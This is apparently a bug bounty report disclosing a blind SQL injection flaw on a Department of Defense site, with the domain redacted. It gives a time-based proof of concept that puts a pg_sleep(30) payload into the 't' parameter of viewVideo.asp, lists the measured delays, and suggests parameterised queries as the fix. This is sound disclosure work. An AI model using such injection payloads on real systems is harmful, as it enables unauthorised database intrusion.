Blind SQL Injection on DoD Site

Hi There, One of the DoD Site is vulnerable to blind sql injection. #Affected Domain: www.███ #PoC: Navigate to below url ``http://www.█████████/viewVideo.asp?t=7`` Just replace ``7`` with ``pg_sleep(__30__)--`` ***GET /viewVideo.asp?t=pg_sleep(__30__)--*** As a response you can see time delay compared with ``viewVideo.asp?t=7`` #####Time Slot: *viewVideo.asp?t=7* -----------> 240-330 milliseconds *viewVideo.asp?t=pg_sleep(__30__)--* -----------> 15000-19000 milliseconds #Fix: Should sanitize the dangerous input or using parameterised queries. Let me know if any further info is required. Regards, **Mr_R3boot**.